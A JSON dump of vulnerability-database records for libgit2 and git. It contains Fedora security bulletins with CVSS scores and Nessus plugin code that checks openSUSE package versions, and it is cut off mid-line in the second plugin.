{"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-11-09T05:26:13", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: libgit2-0.26.8-1.fc28", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10887", "CVE-2018-10888", "CVE-2018-11235", "CVE-2018-17456"], "modified": "2018-11-09T05:26:13", "id": "FEDORA:59FDC63352B3", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/RWUYSQIRNA7BF3QIFK765ETPFQ6URXAE/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:50", "description": "libgit2 is a portable, pure C implementation of the Git core methods provided as a re-entrant linkable library with a solid API, allowing you to write native speed custom Git applications in any language with bindings. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-11-09T05:56:41", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: libgit2-0.26.8-1.fc27", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10887", "CVE-2018-10888", "CVE-2018-11235", "CVE-2018-17456"], "modified": "2018-11-09T05:56:41", "id": "FEDORA:813D86150C93", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/WDTYHGBY3SFDXNHSJNH54FQEMJJLUZOI/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "description": "libgit2 is a portable, pure C implementation of the Git core methods provided as a re-entrant linkable library with a solid API, allowing you to write native speed custom Git applications in any language with bindings. ", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-07-05T15:18:51", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: libgit2-0.26.4-1.fc27", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11235"], "modified": "2018-07-05T15:18:51", "id": "FEDORA:6946D6030B23", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/JJ2UTQMKUC5NNGLZTBPGXZE5SO6TSRZ7/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "description": "libgit2 is a portable, pure C implementation of the Git core methods provided as a re-entrant linkable library with a solid API, allowing you to write native speed custom Git applications in any language with bindings. ", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-07-05T18:39:01", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: libgit2-0.26.4-1.fc28", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11235"], "modified": "2018-07-05T18:39:01", "id": "FEDORA:6DD556015F7B", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/AN3BUPV64POHW6JZCR2ILD4YRIHHKEEQ/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "description": "Git is a fast, scalable, distributed revision control system with an unusually rich command set that provides both high-level operations and full access to internals. The git rpm installs common set of tools which are usually using with small amount of dependencies. To install all git packages, including tools for integrating with other SCMs, install the git-all meta-package. ", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-01T12:06:15", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: git-2.17.1-2.fc28", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11233", "CVE-2018-11235"], "modified": "2018-06-01T12:06:15", "id": "FEDORA:8C7D36068732", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/IZDKYTV3LSCNQMBQXEHWGWIWGJUILTTE/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:50", "description": "Git is a fast, scalable, distributed revision control system with an unusually rich command set that provides both high-level operations and full access to internals. The git rpm installs common set of tools which are usually using with small amount of dependencies. To install all git packages, including tools for integrating with other SCMs, install the git-all meta-package. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-10-10T22:47:45", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: git-2.17.2-1.fc28", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11233", "CVE-2018-11235", "CVE-2018-17456"], "modified": "2018-10-10T22:47:45", "id": "FEDORA:59E4260A442B", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/6H7PLJSU6HD57BAZTTAYHPWURRSQKM6V/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "description": "Git is a fast, scalable, distributed revision control system with an unusually rich command set that provides both high-level operations and full access to internals. The git rpm installs common set of tools which are usually using with small amount of dependencies. To install all git packages, including tools for integrating with other SCMs, install the git-all meta-package. ", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-01T12:21:29", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: git-2.14.4-1.fc27", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-15298", "CVE-2018-11233", "CVE-2018-11235"], "modified": "2018-06-01T12:21:29", "id": "FEDORA:B74CE60CFC7A", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/MWKTL7J5P3OQER7IUHIJXFASGGZMYKI5/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:50", "description": "Git is a fast, scalable, distributed revision control system with an unusually rich command set that provides both high-level operations and full access to internals. The git rpm installs common set of tools which are usually using with small amount of dependencies. To install all git packages, including tools for integrating with other SCMs, install the git-all meta-package. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-10-19T15:50:55", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: git-2.14.5-1.fc27", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-15298", "CVE-2018-11233", "CVE-2018-11235", "CVE-2018-17456"], "modified": "2018-10-19T15:50:55", "id": "FEDORA:B126C60E1762", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/D4P3N2PXTUEO4ANXPE6ILEE565P22K5N/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:50", "description": "Git is a fast, scalable, distributed revision control system with an unusually rich command set that provides both high-level operations and full access to internals. The git rpm installs common set of tools which are usually using with small amount of dependencies. To install all git packages, including tools for integrating with other SCMs, install the git-all meta-package. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-11-28T02:46:33", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: git-2.17.2-2.fc28", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11233", "CVE-2018-11235", "CVE-2018-17456", "CVE-2018-19486"], "modified": "2018-11-28T02:46:33", "id": "FEDORA:360A46406863", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/SIQD4R3AXAVLC7I56GWWF23JHSCDSW2J/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-08-19T12:28:10", "description": "This update for libgit2 to version 0.26.5 fixes the following issues :\n\nThe following security vulnerabilities were addressed :\n\n - CVE-2018-10887: Fixed an integer overflow which in turn leads to an out of bound read, allowing to read the base object, which could be exploited by an attacker to cause denial of service (DoS) (bsc#1100613).\n\n - CVE-2018-10888: Fixed an out-of-bound read while reading a binary delta file, which could be exploited by an attacker t ocause a denial of service (DoS) (bsc#1100612).\n\n - CVE-2018-11235: Fixed a remote code execution, which could occur with a crafted .gitmodules file (bsc#1095219)\n\n - CVE-2018-15501: Prevent out-of-bounds reads when processing smart-protocol 'ng' packets (bsc#1104641)\n\nThis update was imported from the SUSE:SLE-15:Update update project.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-03-27T00:00:00", "type": "nessus", "title": "openSUSE Security Update : libgit2 (openSUSE-2019-638)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-10887", "CVE-2018-10888", "CVE-2018-11235", "CVE-2018-15501"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libgit2-26", "p-cpe:/a:novell:opensuse:libgit2-26-32bit", "p-cpe:/a:novell:opensuse:libgit2-26-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libgit2-26-debuginfo", "p-cpe:/a:novell:opensuse:libgit2-debugsource", "p-cpe:/a:novell:opensuse:libgit2-devel", "cpe:/o:novell:opensuse:15.0"], "id": "OPENSUSE-2019-638.NASL", "href": "https://www.tenable.com/plugins/nessus/123276", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-638.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(123276);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2018-10887\", \"CVE-2018-10888\", \"CVE-2018-11235\", \"CVE-2018-15501\");\n\n script_name(english:\"openSUSE Security Update : libgit2 (openSUSE-2019-638)\");\n script_summary(english:\"Check for the openSUSE-2019-638 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for libgit2 to version 0.26.5 fixes the following issues :\n\nThe following security vulnerabilities were addressed :\n\n - CVE-2018-10887: Fixed an integer overflow which in turn\n leads to an out of bound read, allowing to read the base\n object, which could be exploited by an attacker to cause\n denial of service (DoS) (bsc#1100613).\n\n - CVE-2018-10888: Fixed an out-of-bound read while reading\n a binary delta file, which could be exploited by an\n attacker t ocause a denial of service (DoS)\n (bsc#1100612).\n\n - CVE-2018-11235: Fixed a remote code execution, which\n could occur with a crafted .gitmodules file\n (bsc#1095219)\n\n - CVE-2018-15501: Prevent out-of-bounds reads when\n processing smart-protocol 'ng' packets (bsc#1104641)\n\nThis update was imported from the SUSE:SLE-15:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1095219\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1100612\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1100613\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1104641\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libgit2 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11235\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgit2-26\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgit2-26-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgit2-26-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgit2-26-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgit2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgit2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libgit2-26-0.26.6-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libgit2-26-debuginfo-0.26.6-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libgit2-debugsource-0.26.6-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libgit2-devel-0.26.6-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libgit2-26-32bit-0.26.6-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libgit2-26-32bit-debuginfo-0.26.6-lp150.2.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libgit2-26 / libgit2-26-32bit / libgit2-26-32bit-debuginfo / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:31:26", "description": "This update for libgit2 to version 0.26.5 fixes the following issues :\n\nThe following security vulnerabilities were addressed :\n\n - CVE-2018-10887: Fixed an integer overflow which in turn leads to an out of bound read, allowing to read the base object, which could be exploited by an attacker to cause denial of service (DoS) (bsc#1100613).\n\n - CVE-2018-10888: Fixed an out-of-bound read while reading a binary delta file, which could be exploited by an attacker t ocause a denial of service (DoS) (bsc#1100612).\n\n - CVE-2018-11235: Fixed a remote code execution, which could occur with a crafted .gitmodules file (bsc#1095219)\n\n - CVE-2018-15501: Prevent out-of-bounds reads when processing smart-protocol 'ng' packets (bsc#1104641)\n\nThis update was imported from the SUSE:SLE-15:Update update project.", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H"}, "published": "2018-08-28T00:00:00", "type": "nessus", "title": "openSUSE Security Update : libgit2 (openSUSE-2018-922)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-10887", "CVE-2018-10888", "CVE-2018-11235", "CVE-2018-15501"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libgit2-26", "p-cpe:/a:novell:opensuse:libgit2-26-32bit", "p-cpe:/a:novell:opensuse:libgit2-26-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libgit2-26-debuginfo", "p-cpe:/a:novell:opensuse:libgit2-debugsource", "p-cpe:/a:novell:opensuse:libgit2-devel", "cpe:/o:novell:opensuse:15.0"], "id": "OPENSUSE-2018-922.NASL", "href": "https://www.tenable.com/plugins/nessus/112139", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2018-922.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(112139);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2018-10887\", \"CVE-2018-10888\", \"CVE-2018-11235\", \"CVE-2018-15501\");\n\n script_name(english:\"openSUSE Security Update : libgit2 (openSUSE-2018-922)\");\n script_summary(english:\"Check for the openSUSE-2018-922 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for libgit2 to version 0.26.5 fixes the following issues :\n\nThe following security vulnerabilities were addressed :\n\n - CVE-2018-10887: Fixed an integer overflow which in turn\n leads to an out of bound read, allowing to read the base\n object, which could be exploited by an attacker to cause\n denial of service (DoS) (bsc#1100613).\n\n - CVE-2018-10888: Fixed an out-of-bound read while reading\n a binary delta file, which could be exploited by an\n attacker t ocause a denial of service (DoS)\n (bsc#1100612).\n\n - CVE-2018-11235: Fixed a remote code execution, which\n could occur with a crafted .gitmodules file\n (bsc#1095219)\n\n - CVE-2018-15501: Prevent out-of-bounds reads when\n processing smart-protocol 'ng' packets (bsc#1104641)\n\nThis update was imported from the SUSE:SLE-15:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1095219\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1100612\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1100613\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1104641\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libgit2 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgit2-26\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgit2-26-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgit2-26-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgit2-26-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgit2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgit2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = 